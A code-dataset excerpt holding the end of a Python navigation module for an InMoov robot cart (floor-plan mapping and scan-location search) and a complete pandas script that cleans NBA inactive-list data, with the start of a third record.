True\n\n if show:\n cv2.line(config.cartcamImage, (320,0),(320,479),255,2)\n cv2.imshow(\"cartCam\", config.cartcamImage)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n return True\n\n\ndef takeCartcamImage(show=False):\n\n #config.cartcamImage = rpcSend.getImage(inmoovGlobal.CART_CAM)\n # [,,,,optional]\n request = {'sender': config.processName, 'cmd': mg.ImageProcessingCommand.CHECK_FOR_ARUCO_CODE, 'cam': mg.CART_CAM, 'markers':[]}\n config.marvinShares.imageProcessingQueue.put(request)\n\n # response by queue\n\n\ndef addCenter(img):\n # draw hair cross at 0,0\n hairCrossColor = (0,255,255)\n cv2.line(img, (495,500), (505, 500), hairCrossColor , 1)\n cv2.line(img, (500, 495), (500, 505), hairCrossColor, 1)\n\n\n\ndef addTarget(img):\n # show target if requested\n targetMapX, targetMapY = evalMapLocation(config.oTarget.getCartX(), config.oTarget.getCartY())\n cv2.circle(img,(targetMapX,targetMapY), 4, config.targetColor, -1)\n\n\ndef addMarker(img, markerX, markerY, markerDegrees):\n mapX, mapY = evalMapLocation(markerX, markerY)\n #config.log(f\"markerMapX: {mapX}, markerMapY: {mapY}, markerDegrees:{markerDegrees}\")\n addArrow(img, mapX, mapY, markerDegrees+90, 600/20, config.markerColor) # cart center 600 mm in front of marker\n baseLength = 10\n baseXCorr = int(baseLength * np.cos(np.radians(markerDegrees)))\n baseYCorr = int(baseLength * np.sin(np.radians(markerDegrees)))\n cv2.line(img,(mapX - baseXCorr, mapY + baseYCorr), (mapX + baseXCorr, mapY - baseYCorr), config.markerColor, 3)\n cv2.line(img,(mapX - baseXCorr, mapY + baseYCorr), (mapX + baseXCorr, mapY - baseYCorr), (0,0,0), 1)\n\n\ndef addPathToTarget(img):\n cartMapX, cartMapY = evalMapLocation(config.oCart.getCartX(), config.oCart.getCartY())\n targetMapX, targetMapY = evalMapLocation(config.oTarget.getCartX(), config.oTarget.getCartY())\n cv2.line(img,(cartMapX, cartMapY), (targetMapX, targetMapY), (0,0,255), 4)\n\n\ndef addArrow(img, mapX, mapY, degrees, length, color=(128,128,128)):\n\n arrowXCorr = int(length * np.cos(np.radians(degrees)))\n arrowYCorr = int(length * np.sin(np.radians(degrees)))\n #cv2.circle(img, (mapX,mapY), 3, color, -1)\n cv2.arrowedLine(img, (mapX, mapY),\n (mapX + arrowXCorr, mapY - arrowYCorr), color, 3, tipLength=0.3) # mark cart degrees\n cv2.arrowedLine(img, (mapX, mapY),\n (mapX + arrowXCorr, mapY - arrowYCorr), (0,0,0), 1, tipLength=0.3) # black inside\n return img\n\n\ndef addCart(img, cartX, cartY, cartDegrees, cartColor):\n \"\"\"\n img is the map (1000*1000 pix)\n can draw a cart on the map\n :param img:\n :return:\n \"\"\"\n mapX, mapY = evalMapLocation(cartX, cartY)\n\n # overlay cart at position and degrees\n cartImg = np.zeros((CART_WIDTH_MAP+2, CART_LENGTH_MAP+2, 3), dtype = np.uint8)\n cv2.rectangle(cartImg, (0,0),(CART_LENGTH_MAP, CART_WIDTH_MAP), cartColor, 1)\n h,w = cartImg.shape[:2]\n\n # add arrow\n addArrow(cartImg, round(w-14), round(h/2), 0, 10, cartColor)\n\n # make sure image size adjusts to rotated cart size\n #rotated = imutils.rotate_bound(cartImg, -config.oCart.getCartYaw())\n rotated = imutils.rotate_bound(cartImg, -cartDegrees)\n rotH,rotW = rotated.shape[:2]\n\n # add cart to map\n x1 = mapX - round(rotW/2)\n x2 = x1 + rotW\n y1 = mapY - round(rotH/2)\n y2 = y1 + rotH\n img[y1:y2,x1:x2,:] = rotated\n\n #config.log(f\"cartMapX: {mapX}, cartMapY: {mapY}, cartDegrees:{cartDegrees}\")\n\n cv2.circle(img, (mapX,mapY), 5, cartColor)\n #cv2.imshow(\"cart\", img)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n\n\ndef loadMapInfo():\n \"\"\"\n the cartControl task keeps track of position and location. this is necessary because the cart\n can also be moved by directly using the cartControl interface without connection to the navManager\n \"\"\"\n\n # Getting back the map data:\n filename = f\"{config.PATH_ROOM_DATA}/mapInfo.json\"\n if os.path.exists(filename):\n with open(filename, \"r\") as read_file:\n mapInfo = json.load(read_file)\n\n config.room = mapInfo['room']\n config.fullScanDone = mapInfo['fullScanDone']\n\n else:\n config.room = 'unknown'\n config.fullScanDone = False\n saveMapInfo()\n\n #rpcSend.queryCartInfo()\n\n\ndef saveMapInfo():\n # Saving the objects:\n mapInfo = { 'room': config.room, 'fullScanDone': config.fullScanDone }\n filename = f\"{config.PATH_ROOM_DATA}/mapInfo.json\"\n with open(filename, \"w\") as write_file:\n json.dump(mapInfo, write_file, indent=2)\n\n\n\ndef rotateImage(img, rotation):\n cols, rows = img.shape[:2]\n M = cv2.getRotationMatrix2D((cols/2,rows/2), rotation, 1)\n return cv2.warpAffine(img, M, (cols,rows))\n\n\ndef cropped(imgA, imgB):\n \"\"\"\n The cropped function returns the relevant part of the 2 images based on white pixels\n In addition it leaves a small black border to allow for small shifting without losing pixels\n :param imgA:\n :param imgB:\n :return:\n \"\"\"\n mask = imgA > 0\n coords = np.argwhere(mask) # Coordinates of non-black pixels.\n iAy0, iAx0 = coords.min(axis=0) # Bounding box of non-black pixels.\n iAy1, iAx1 = coords.max(axis=0) + 1 # slices are exclusive at the top\n\n mask = imgB > 0\n coords = np.argwhere(mask) # Coordinates of non-black pixels.\n iBy0, iBx0 = coords.min(axis=0) # Bounding box of non-black pixels.\n iBy1, iBx1 = coords.max(axis=0) + 1 # slices are exclusive at the top\n\n y0 = min(iAy0, iBy0) - 10\n x0 = min(iAx0, iBx0) - 10\n y1 = max(iAy1, iBy1) + 10\n x1 = max(iAx1, iBx1) + 10\n\n return imgA[y0:y1, x0:x1], imgB[y0:y1, x0:x1], y0, x0 # Get a pointer to the bounding box within colImg\n\n\ndef evalMaxProbeDistance(x, y):\n \"\"\"\n based on the current cart position on the map eval the max distance\n to the map border\n \"\"\"\n n1 = np.linalg.norm(np.array([x, y]))\n n2 = np.linalg.norm(np.array([MAP_HEIGHT - x, y]))\n n3 = np.linalg.norm(np.array([x, MAP_WIDTH - y]))\n n4 = np.linalg.norm(np.array([MAP_HEIGHT - x, MAP_WIDTH - y]))\n\n return int(max(np.array([n1,n2,n3,n4])))\n\n \ndef evalNewPos(x, y, deg, dist):\n xNew = int(x + dist * np.cos(np.radians(deg)))\n yNew = int(y - dist * np.sin(np.radians(deg)))\n return (xNew, yNew)\n\n\n\n\ndef findNewScanLocation():\n \"\"\"\n based on the map, the cart size and already visited places try to find another\n position to scan for markers\n\n Be careful with units!\n we have map pixels and mm. from the map we get pixel values, for all Distances\n used for cart movements we use however millimeters\n \"\"\"\n\n #########################################################\n showEval = True\n ##########################################################\n wait = 0\n config.log(f\"start findNewScanLocation\")\n SCAN_DEGREE_STEPS = 5\n numSections = int(360 / SCAN_DEGREE_STEPS)\n obstacleSpot = np.zeros(numSections)\n candidateSpot = np.zeros(numSections)\n checkPosMapX = np.zeros(numSections, dtype=np.uint16)\n checkPosMapY = np.zeros(numSections, dtype=np.uint16)\n\n floorPlanFatCopy = np.copy(config.floorPlanFat)\n '''\n beside the real obstacles we also want to avoid going forth and back between 2 scan positions.\n Block distance/degree positions already scanned and create a virtual obstacle at the recorded scan positions\n Do not include current position in blocking\n '''\n #cv2.imshow(\"floorPlanFatCopy\", floorPlanFatCopy)\n\n for i in range(len(config.scanLocations) - 1):\n mapX = int(config.scanLocations[i][0] / MM_PER_MAP_PIXEL) + 500\n mapY = 500 - int(config.scanLocations[i][1] / MM_PER_MAP_PIXEL)\n cv2.circle(floorPlanFatCopy, (mapX, mapY), cartRadiusPix*2, SCAN_LOCATION_MARKER_SHADE, -1)\n\n '''\n Based on the current cart position define the max distance to the map corners.\n This limits the range we have to look for obstacles\n '''\n mapX, mapY = evalMapLocation(config.oCart.getCartX(), config.oCart.getCartY())\n maxProbeDistance = evalMaxProbeDistance(mapX, mapY)\n \n # in maxProbeDistance range check for obstacle-free cart position\n for mapDistance in range(2*cartRadiusPix, maxProbeDistance, cartRadiusPix):\n\n # for a set of directions check for obstacles\n for loop2 in range(0, len(obstacleSpot)):\n\n # check for direction already blocked\n if obstacleSpot[loop2] > 0:\n continue\n\n # each entry in obstacleDistances is bound to a direction\n # modify direction to get 0 as straight up\n direction = (loop2 * SCAN_DEGREE_STEPS) % 360\n\n # position of obstacle detection with direction and distance off the current location\n checkPosMapX[loop2], checkPosMapY[loop2] = evalNewPos(mapX, mapY, direction, mapDistance)\n\n #print(f\"direction: {direction}, checkPosMap: {checkPosMapX,checkPosMapY}\")\n\n spotlightSize = int(1.5 * cartRadiusPix)\n \n mask = cv2.circle(np.zeros((MAP_WIDTH, MAP_HEIGHT), dtype=np.uint8),\n (checkPosMapX[loop2], checkPosMapY[loop2]),\n spotlightSize, 255, -1)\n # cv2.imshow(\"mask\", mask)\n\n # for visualization only (ring)\n if showEval:\n mask1 = cv2.circle(np.zeros((MAP_WIDTH, MAP_HEIGHT), dtype=np.uint8), (checkPosMapX[loop2],checkPosMapY[loop2]), spotlightSize, 255)\n merged = floorPlanFatCopy + mask1\n #print(f\"loop2: {loop2}, checkPosMap: {checkPosMapX[loop2], checkPosMapY[loop2]}\")\n\n obst = cv2.bitwise_and(floorPlanFatCopy, mask)\n\n if showEval:\n #print(f\"pixels in mask {np.sum(obst)}\")\n #cv2.imshow(\"obst\", obst)\n cv2.imshow(\"find location\", merged)\n cv2.waitKey(wait)\n wait=1\n #cv2.destroyAllWindows()\n\n # if the bitwise and of map and mask > 50 (ignore single bits) set the distance as obstacleDistance\n # this will only find locations on a direct path\n boolArray = np.asarray(obst)\n whitePixInSpot = (boolArray > SCAN_LOCATION_MARKER_SHADE).sum()\n if whitePixInSpot > 50:\n obstacleSpot[loop2] = mapDistance * MM_PER_MAP_PIXEL # this blocks further checks in that direction\n else:\n # check for spot area in previous scan location\n grayPixInSpot = (boolArray == SCAN_LOCATION_MARKER_SHADE).sum()\n if grayPixInSpot < 50:\n # add to candidate if area is not visited yet\n candidateSpot[loop2] = mapDistance * MM_PER_MAP_PIXEL\n\n #navGlobal.log(f\"obstacle at degree: {loop2 * SCAN_DEGREE_STEPS}, mapDistance: {mapDistance * 20}, obst: {np.sum(obst)}\")\n\n\n # find the longest free move, index of farthest candidate spot\n idxCandidate = int(np.argmax(candidateSpot))\n\n mapX, mapY = evalMapLocation(config.oCart.getCartX(), config.oCart.getCartY())\n\n if showEval:\n #config.log(f\"idxCandidate: {idxCandidate}, targetPosMap = {checkPosMapX[idxCandidate], checkPosMapY[idxCandidate]}\")\n target = np.copy(config.floorPlanFat)\n cv2.circle(target, (checkPosMapX[idxCandidate], checkPosMapY[idxCandidate]), 10, 255)\n cv2.line(target, (mapX, mapY), (checkPosMapX[idxCandidate], checkPosMapY[idxCandidate]), 255, 2)\n\n locationId = f\"{checkPosMapX[idxCandidate]:.0f}_{checkPosMapY[idxCandidate]:.0f}\"\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanParts/newScanLoc{locationId}.jpg\", target)\n cv2.imshow(\"find location\", target)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n # idxCandidate is the number of lookup steps to find the farthest corner\n # lookout starts with cart degrees\n targetInMapDegree = idxCandidate * SCAN_DEGREE_STEPS\n\n config.log(f\"idxCandidate: {idxCandidate}, targetPosMap = {checkPosMapX[idxCandidate], checkPosMapY[idxCandidate]}, degrees: {targetInMapDegree}, distance: {obstacleSpot[idxCandidate]}\")\n #cv2.waitKey()\n\n # check for minimal distance for gaining new information\n if obstacleSpot[idxCandidate] < 1500:\n # give up\n config.log(f\"findNewScanLocation, no candidate position found, min. distance = 1500\")\n return (0,0)\n else:\n # go partially towards that direction\n \n # try to move close to the border to avoid blocking future positions\n distanceMm = obstacleSpot[idxCandidate] - 500\n\n #cartX, cartY = config.getCartLocation()\n #config.log(f\"new scan location found, degree: {int(targetInMapDegree)}, distance: {int(distanceMm)}, cartX: {cartX}, cartY: {cartY}\")\n config.log(f\"new scan location found, degree: {int(targetInMapDegree)}, \"\n f\"distance: {int(distanceMm)}, \"\n f\"cartX: {config.oCart.getCartX()}, cartY: {config.oCart.getCartY()}\")\n\n # return the candidate angle and distance (absolute map value)\n return (targetInMapDegree, distanceMm)\n\n\ndef rebuildMap():\n\n clearFloorPlan()\n\n directory = \"D:/Projekte/InMoov/navManager/ROOMS/unknown/floorPlan\"\n if os.path.isfile(f\"{directory}/floorPlan.jpg\"):\n os.remove(f\"{directory}/floorPlan.jpg\")\n if os.path.isfile(f\"{directory}/floorPlanFat.jpg\"):\n os.remove(directory + \"/floorPlanFat.jpg\")\n\n for file in os.listdir(directory):\n\n if file.endswith(\".json\"):\n with open(f\"{directory}/{file}\", \"r\") as read_file:\n obstacleList = json.load(read_file)\n depthCamDistances = np.array(obstacleList)\n depthCamDegrees = int(file.split()[1].split(\".\")[0])\n config.log(f\"load partialMap {len(depthCamDistances)} {depthCamDegrees}\")\n config.flagAddPartialMap = True\n\n timeout = time.time() + 5\n while not config.flagAddPartialMapDone and time.time() < timeout:\n time.sleep(0.5)\n if time.time() > timeout:\n config.log(f\"timeout addPartialMapDone\")\n navManager.setTask(\"notask\")\n else:\n continue\n\n\n\ndef adjustCartLocation(showBest=True):\n \"\"\"\n if this is not the first full scan verify the carts position\n When doing a fullScanAtPosition we might end up with a floor plan that is slightly misaligned in relation\n to the existing floor plan\n It looks like the IMU is rather stable and rotating the scan plan for alignment does not help much\n However caused by the carts wheel slippage and the only roughly estimated side moves the cart position\n might be off after a number of moves\n Try to find the best shift (x,y) of the scan plan to match the floor plan\n \"\"\"\n\n config.log(f\"try to align new full scan floor plan with existing plan\")\n\n # use gray image\n if len(config.floorPlanFat.shape) == 3:\n im1Gray = cv2.cvtColor(config.floorPlan, cv2.COLOR_BGR2GRAY)\n else:\n im1Gray = config.floorPlanFat\n if len(config.fullScanPlanFat.shape) == 3:\n im2Gray = cv2.cvtColor(config.fullScanPlanFat, cv2.COLOR_BGR2GRAY)\n else:\n im2Gray = config.fullScanPlanFat\n\n # limit comparison to white area with a black border\n imA, imB, dy, dx = cropped(im1Gray, im2Gray)\n\n x, y = 0,0\n\n im12 = cv2.add(imA, imB)\n\n im12Sum = np.sum(im12) # reference sum to be optimized by rotation and shift of imgB\n #print(im12Sum)\n best = [im12Sum, x, y]\n\n # move new scan plan pixelwise around to find best match with floor plan\n # its currently brute force and does not try to shorten the loops\n for x in range(-15,15):\n imBx = imutils.translate(imB,x,0)\n\n for y in range(-15,15):\n imBxy = imutils.translate(imBx,0,y)\n imABxy = cv2.add(imA,imBxy)\n imABxySum = np.sum(imABxy)\n\n if imABxySum < best[0]:\n best = [imABxySum, x, y]\n imBest = imABxy.copy()\n\n\n # skeletonize the plan and fatten with cart size again\n # TODO find a way to get rid ot the strings attached to the contour\n skeleton = skeletonize(imBest > 100).astype(np.uint8)\n skeleton = cv2.bitwise_and(imBest, imBest, mask=skeleton)\n\n # replace area in floor plan with imBest\n h,w = imBest.shape\n im1Gray[dy:dy+h,dx:dx+w] = skeleton\n config.floorPlan = im1Gray\n\n kernel7 = np.ones((7,7),np.uint8)\n skeletonFat = cv2.dilate(skeleton, kernel7, iterations=5)\n im1Gray[dy:dy+h,dx:dx+w] = skeletonFat\n config.floorPlanFat = im1Gray\n\n # persist the floorPlan\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlan.jpg\", config.floorPlan)\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanFat.jpg\", config.floorPlanFat)\n\n # move fullScanFat by the same offset pixels\n #imFat = imutils.translate(config.fullScanPlanFat, x, y)\n #imFat = cv2.add(config.floorPlanFat, imFat)\n ##cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanFat.jpg\", imFat)\n\n # use the new map offset to correct the cart location\n xCorr = best[1] * MM_PER_MAP_PIXEL\n yCorr = best[2] * MM_PER_MAP_PIXEL\n\n config.log(f\"update cart position based on full scan, xCorr:{xCorr}, yCorr: {yCorr}\")\n rpcSend.adjustCartPosition(xCorr, yCorr, 0)\n\n if showBest:\n \"\"\"\n wName = f\"best, {best[1]}, {best[2]}\"\n cv2.imshow(wName, imBest)\n cv2.moveWindow(wName, 100,500)\n\n wName = f\"skeleton\"\n cv2.imshow(wName, config.floorPlan)\n cv2.moveWindow(wName, 500,100)\n \"\"\"\n wName = f\"dilated\"\n cv2.imshow(wName, config.floorPlanFat)\n cv2.moveWindow(wName, 500,500)\n\n cv2.waitKey(1000)\n cv2.destroyAllWindows()\n\n\n\ndef fullScanAtPosition(lookForMarkers=None):\n \"\"\"\n will start at current cart position and degrees\n takes with different head rotation/neck angles rgb images and scans them for markers\n with head rotation angle 0 takes a depth image and creates the obstacle line\n after a full head scan rotates the cart (around center of cart)\n\n all eyecam pictures are added to the room folder\n\n identified markers are added to the marker list\n\n after full cart rotation try to find another cart position for completing the floor plan (findNewScanLocation)\n if none found consider room as mapped\n \"\"\"\n\n config.log(f\"in fullScanAtPosition\")\n\n if lookForMarkers is None: # python issue, a mutable default param lookForMarkers=[] raises an error\n lookForMarkers = []\n\n platformImu = config.marvinShares.cartDict.get(mg.SharedDataItem.PLATFORM_IMU)\n startAngle = platformImu.yaw\n\n # move InMoov eye cam into capturing pose\n #requestQueue.put({'cmd': 'setAutoDetach', 'servoName': servoName, 'duration': duration})\n msg = {'cmd': 'setAutoDetach', 'servoName': 'head.neck', 'duration': 5000}\n config.marvinShares.skeletonRequestQueue.put(msg)\n\n # eval number of necessary cart rotations to get a full circle\n # use the fovH of the HEAD_CAM cam\n headFovH = 69.4 if 'cartControl' in config.processSimulated else mg.headCamProperties(['fovH'])\n numPlannedCartRotationSteps = int(360 / headFovH)\n cartRange = int(360 / (numPlannedCartRotationSteps + 1))\n\n # start with an empty scan plan\n config.fullScanPlan = np.zeros((MAP_WIDTH, MAP_HEIGHT), dtype=np.uint8)\n config.fullScanPlanFat = np.zeros((MAP_WIDTH, MAP_HEIGHT), dtype=np.uint8)\n\n # for all orientations of the cart\n eyeFovH = mg.eyeCamProperties['fovH']\n numPlannedHeadRotationSteps = int(cartRange / eyeFovH)\n headRange = int(cartRange / (numPlannedHeadRotationSteps + 1))\n\n while numPlannedCartRotationSteps > 0:\n\n # request a cartcam picture, done in navMap thread\n config.log(f\"take cartcam image, degrees: {config.oCart.getCartYaw()}\")\n takeCartcamImage()\n\n # take several Eyecam images and one depth image with this cart orientation\n if marker.scanWithHead(startDegrees= -cartRange/2 + headRange/2,\n endDegrees=cartRange/2 - headRange/2,\n steps=numPlannedHeadRotationSteps+1):\n\n # check for image processing done\n timeout = time.time() + 5\n while config.flagProcessCartcamImage and time.time() < timeout:\n time.sleep(0.1)\n if time.time() > timeout:\n config.log(f\"navMap, timeout processing CartcamImage, stopping scan\")\n return False\n\n while not config.flagAddObstaclesToMap and time.time() < timeout:\n time.sleep(0.1)\n if time.time() > timeout:\n config.log(f\"navMap, timeout processing DepthcamImage, stopping scan\")\n return False\n\n guiUpdate.guiUpdateQueue.append({'type': guiUpdate.updType.MAP})\n\n # rotate cart\n numPlannedCartRotationSteps -= 1\n depthXRange = config.cams[inmoovGlobal.HEAD_CAM]['fovH']\n relAngle = 360 - (numPlannedCartRotationSteps * depthXRange)\n nextDegrees = (relAngle + startAngle) % 360\n config.log(f\"start angle: {startAngle}, rotation steps: {numPlannedCartRotationSteps}, next degrees: {nextDegrees}\")\n\n if numPlannedCartRotationSteps > 0:\n try:\n #config.log(f\"rotation disabled for test\")\n if cartHandling.createMoveSequence(nextDegrees, 0, 0):\n cartHandling.moveCart()\n except Exception as e:\n config.log(f\"failure in cart rotation to {nextDegrees} degrees, {e}\")\n return False\n\n else:\n config.log(f\"scan with head failure\")\n return False # problems with scanWithHead\n\n if not config.fullScanDone:\n # save first floor plan\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlan.jpg\", config.floorPlan)\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanFat.jpg\", config.floorPlanFat)\n\n config.fullScanDone = True\n\n # TODO ask for room name\n saveMapInfo()\n\n imageName = buildImageName(config.depthCamX, config.depthCamY)\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanParts/fullScanPlan_{imageName}.jpg\", config.fullScanPlan)\n cv2.imwrite(f\"{config.PATH_ROOM_DATA}/{config.room}/floorPlan/floorPlanParts/fullScanPlanFat_{imageName}.jpg\", config.fullScanPlanFat)\n\n # for additional full scans verify the alignment with the floor plan and adjust cart location\n if len(config.scanLocations) > 1:\n adjustCartLocation()\n\n addScanLocation() # let us remember we have been here, use corrected position\n\n\n # look out straight for next moves\n robotHandling.servoMoveToPosition('head.eyeY', 90)\n robotHandling.servoMoveToPosition('head.rothead', 90)\n\n # silence neck and rothead (head may move down though)\n robotHandling.servoSetAutoDetach('head.neck', 300)\n robotHandling.servoSetAutoDetach('head.rothead', 300)\n return True\n\n\ndef createImageFolders():\n \"\"\"\n copy existing room folder to folder ..._depricated\n create new empty room folders\n :return:\n \"\"\"\n config.log(f\"move current room to _depricated folder\")\n roomFolder = f\"{config.PATH_ROOM_DATA}/{config.room}\"\n if os.path.exists(roomFolder):\n if os.path.exists(roomFolder+\"_depricated\"):\n config.log(f\"remove _depricated folder\")\n try:\n shutil.rmtree(roomFolder+\"_depricated\", ignore_errors=True)\n except Exception as e:\n config.log(f\"could not remove roomFolder: {roomFolder}_depricated, error: {str(e)}\")\n return False\n\n config.log(f\"renamed current room folder to _depricated folder\")\n time.sleep(1)\n try:\n os.rename(roomFolder, roomFolder+\"_depricated\")\n except Exception as e:\n config.log(f\"can not rename roomFolder: {roomFolder} to {roomFolder}_depricated, error: {str(e)}\")\n\n if os.path.exists(roomFolder):\n config.log(f\"room folder still here, try to remove it\")\n try:\n #os.system(f\"rm -fr {roomFolder}\")\n shutil.rmtree(roomFolder, ignore_errors=True)\n time.sleep(1)\n except Exception as e:\n config.log(f\"could not remove roomFolder: {roomFolder}, error: {str(e)}\")\n return False\n\n config.log(f\"create empty folders\")\n floorPlanFolder = f\"{roomFolder}/floorPlan\"\n if not os.path.exists(floorPlanFolder):\n os.makedirs(floorPlanFolder)\n\n floorPlanPartsFolder = f\"{roomFolder}/floorPlan/floorPlanParts\"\n if not os.path.exists(floorPlanPartsFolder):\n os.makedirs(floorPlanPartsFolder)\n\n wallImagesFolder = f\"{roomFolder}/wallImages\"\n if not os.path.exists(wallImagesFolder):\n os.makedirs(wallImagesFolder)\n\n cartcamImagesFolder = f\"{roomFolder}/cartcamImages\"\n if not os.path.exists(cartcamImagesFolder):\n os.makedirs(cartcamImagesFolder)\n\n config.log(f\"delete scan and marker locations and move history\")\n scanLocationFile = f\"{roomFolder}/scanLocations.json\"\n if os.path.exists(scanLocationFile):\n os.remove(scanLocationFile)\n markerLocationFile = f\"{roomFolder}/markerLocations.json\"\n if os.path.exists(markerLocationFile):\n os.remove(markerLocationFile)\n moveHistoryFile = f\"{roomFolder}/moveHistory.json\"\n if os.path.exists(moveHistoryFile):\n os.remove(moveHistoryFile)\n\n config.log(f\"file work for new room done\")\n\n return True\n\n\ndef createFloorPlan():\n\n config.log(f\"clear folders for new floor plan\")\n if not createImageFolders():\n config.log(f\"could not remove room folder, open in exlorer/qdir?\")\n return False\n\n # until we have a map update function start with a clear floor plan\n clearFloorPlan()\n\n # set location in cartControl to 0\n if 'cartControl' not in config.processSimulated:\n config.servers['cartControl'].conn.root.setCartLocation(0, 0)\n\n return True\n\n\ndef rover():\n\n config.log(f\"in rover\")\n try:\n\n absDegree, distance = findNewScanLocation()\n if distance > 0:\n\n if cartHandling.createMoveSequence(absDegree, distance, 200):\n if cartHandling.moveCart():\n navManager.setTask(\"pop\")\n return\n else:\n config.log(f\"move to new scan location failed\")\n else:\n config.log(f\"no other scan location found\")\n\n except config.CartError as e:\n config.log(f\"rover - cart command unsuccessful {e}\")\n #except Exception as e:\n # config.log(f\"rover, unexpected exception in rover: {e}\")\n\n navManager.setTask(\"notask\")\n return\n\n\n\n","sub_path":"navMap.py","file_name":"navMap.py","file_ext":"py","file_size_in_byte":33305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"333248086","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis script performs simple cleaning operations on Inactive List data scraped\nusing \"inactivelist_scrape.py\". It reads in a .csv containing scraped data and\nsaves this cleaned data as a pickled Pandas dataframe.\n\n- Formats date\n- Formats team names\n- Formats names to match those in player stats; drops rows with missing data\n\nRequired Inputs:\n - 'prosportstransactions_scrape_IRL_2010_2019.csv'\n - 'teams_nickname_dictionary.p'\n - 'names_with_stats.p'\nOutputs:\n - 'inactive_list_cleaned.p'\n\n@author: evanl\n\"\"\"\nfrom player_name_standardizer import player_name_standardizer\nimport pandas as pd\nimport pickle\n\npd.set_option('display.expand_frame_repr', False)\n\n#-----------------------------User Inputs------------------------------------\n\n#path to scraped file\nscraped_file_path = '../../data/01_raw/prosportstransactions_scrape_IRL_2010_2019.csv'\n\n#save path and output filename\nsavepath='../../data/02_cleaned/inactive_list_cleaned.p'\n\n#path to team nickname dictionary (used to standardize team names)\nteam_pickle_path = '../../references/01_dictionaries/teams_nickname_dictionary.p'\n\n#path to Panda series of players with scraped player stats\nnames_file_path='../../data/02_cleaned/names_with_stats.p'\n\n#-------------------------Load Files-----------------------------------\n\n#Read in previously scraped Inactive List Data\ninactive_list_df = pd.read_csv(scraped_file_path,index_col = 0)\n\n#Read in team name dictionary (used to standardize team names)\nteam_name_dict = pickle.load(open( team_pickle_path, \"rb\" )) \n\n#Read in Panda series of player names with scraped player stats\nnames_with_stats_series = pickle.load(open(names_file_path, \"rb\" )) \n\n#-------------------Clean Data - Section 1: Format Date----------------------\n\n#Change \"Date\" values from object data type to a date data type and sort data frame by date (past ---> present)\ninactive_list_df['Date']=pd.to_datetime(inactive_list_df['Date'],infer_datetime_format=True)\ninactive_list_df.sort_values(by = 'Date', inplace = True)\ninactive_list_df.reset_index(drop = True, inplace = True)\n\n#----------------- Clean Data - Section 2: Format Team Names------------------\n\n#Change team name to full name with city and mascot\n#Handle special cases first (same mascot, two different cities - New Jersey Nets, Brooklyn Net, New Orleans Hornets, Charlotte Hornets)\ninactive_list_df.loc[((inactive_list_df['Team'] == 'Nets') & (inactive_list_df['Date'] <= pd.to_datetime('2012-06-18',infer_datetime_format=True))), 'Team'] = 'New Jersey Nets'\ninactive_list_df.loc[((inactive_list_df['Team'] == 'Nets') & (inactive_list_df['Date'] >= pd.to_datetime('2012-06-18',infer_datetime_format=True))), 'Team'] = 'Brooklyn Nets'\ninactive_list_df.loc[((inactive_list_df['Team'] == 'Hornets') & (inactive_list_df['Date'] <= pd.to_datetime('2013-06-18',infer_datetime_format=True))), 'Team'] = 'New Orleans Hornets'\ninactive_list_df.loc[((inactive_list_df['Team'] == 'Hornets') & (inactive_list_df['Date'] >= pd.to_datetime('2013-06-18',infer_datetime_format=True))), 'Team'] = 'Charlotte Hornets'\n\n#Map remaining teams to full team name using team_name_dict\ninactive_list_df['Team'] = inactive_list_df['Team'].map(team_name_dict)\n\n#Drop rows with no team name \ninactive_list_df.drop(index = inactive_list_df[inactive_list_df['Team'].isnull()].index, inplace = True)\n\n##---------------Clean Data - Section 3: Format Player Names-------------------\n\n#Check if any rows have a null for both \"Acquired\" and \"Relinquished\" columns; drop these rows\nacquired_null_df = inactive_list_df[inactive_list_df['Acquired'].isnull()]\nno_player_name_df = acquired_null_df[acquired_null_df['Relinquished'].isnull()]\ninactive_list_df.drop(no_player_name_df.index, inplace = True)\n\n#Separate out player names (some players have multiple names, each separated by a \"/\")\nall_events_names = inactive_list_df['Acquired'].fillna('') + inactive_list_df['Relinquished'].fillna('')\n\naliases_df = all_events_names.str.split(pat = '/', expand = True)\naliases_df.columns = ['Player', 'Alt_name_1', 'Alt_name_2'] \n\n#Remove any strings in parentheses in player names (removes parentheses and the string within the parentheses)\naliases_df.replace(regex = ['\\(.*?\\)'], value = '', inplace = True)\n\n#Remove suffixes on player names\naliases_df.replace(regex = ['Jr\\.'], value = '', inplace = True)\naliases_df.replace(regex = ['III'], value = '', inplace = True)\naliases_df.replace(regex = ['IV'], value = '', inplace = True)\n\n#Remove periods in player names\naliases_df['Player'].replace('\\.', '', regex=True, inplace = True)\naliases_df['Alt_name_1'].replace('\\.', '', regex=True, inplace = True)\naliases_df['Alt_name_2'].replace('\\.', '', regex=True, inplace = True)\n\n#Remove extra white spaces at the start or end of player names\naliases_df['Player']= aliases_df['Player'].str.strip()\naliases_df['Alt_name_1']= aliases_df['Alt_name_1'].str.strip()\naliases_df['Alt_name_2']= aliases_df['Alt_name_2'].str.strip()\n\n#Make player name spelling consistent with those in scraped stats data\n#Create a dictionary that will be used to map spellings\nplayer_spelling_dict = player_name_standardizer(aliases_df,names_with_stats_series)\n\n#Map panda series 'names_with_stats' player name spellings to 'missed_games_df'\naliases_df['Player'] = aliases_df['Player'].map(player_spelling_dict )\ninactive_list_df['Player'] = aliases_df['Player']\n\n#-----------------------Save Cleaned Data-----------------------------\nprint('Saving files......')\n\n#save file\npickle.dump(inactive_list_df, open(savepath, \"wb\" ) )\n\nprint('Finished')","sub_path":"src/d02_clean/clean_inactivelist.py","file_name":"clean_inactivelist.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"262670045","text":"\"\"\"\ncorrect for integer ambiguities in carrier phase data...\n\nThis file 